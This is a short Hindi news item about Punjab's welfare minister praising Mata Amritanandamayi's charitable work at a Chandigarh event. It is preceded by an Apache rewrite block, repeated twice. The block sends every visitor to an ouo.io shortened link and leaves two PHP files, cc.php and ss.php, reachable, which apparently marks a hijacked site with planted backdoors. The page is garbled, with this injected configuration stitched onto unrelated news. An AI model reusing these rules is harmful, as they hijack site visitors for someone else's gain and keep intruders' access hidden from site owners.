
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 644
Previous Nextचंडीगढ़। समाज सुधार और लोक कल्याण में चैरिटेबल संस्थाओं का योगदान बहुमूल्य है। यह बात पंजाब के कल्याण मंत्री सरदार साधु सिंह धर्मसोत ने कही। उन्होंने यह विचार आज यहां माता अमृतानंदमयी देवी से संबंधित एक धार्मिक समारोह में व्यक्त किए। धर्मसोत ने मुख्यमंत्री कैप्टन अमरिंदर सिंह की ओर से माता अमर्तानंदामयी देवी से संबंधित समारोह में शिरकत की। सरदार धर्मसोत ने कहा कि मानवता के प्रति निस्वार्थ भाव व दयालुता के लिए माता अमृतानंदमयी देवी को विश्व भर में ‘अम्मा’के तौर पर जाना जाता है। उन्होंने कहा कि माता (अम्मा) का संपूर्ण जीवन गरीबों और शारीरिक तथा भावनात्मक तौर पर दुखी लोगों की पीड़ा को घटाने के लिए समर्पित रहा है और अब तक माता अमृतानंदमयी देवी ने 3.7 करोड़ से अधिक लोगों को अपनाकर बेहतर जीवन जीने की हिम्मत दी है। सरदार धर्मसोत ने कहा कि माता ने अपने आत्मिक ज्ञान, प्यार और विश्वस्तरीय चैरिटेबल संस्थाओं की मदद से अनेक लोगों को अपने जीवन में सकारात्मक तब्दीली लाने के लिए प्रेरित किया है। उन्होंने बताया कि विश्वभर में फैली इन चैरिटेबल संस्थाओं को साझे तौर पर ऐंब्रेसिंग द वर्ल्ड (विश्व को गले लगाने वाले) के तौर पर जाना जाता है।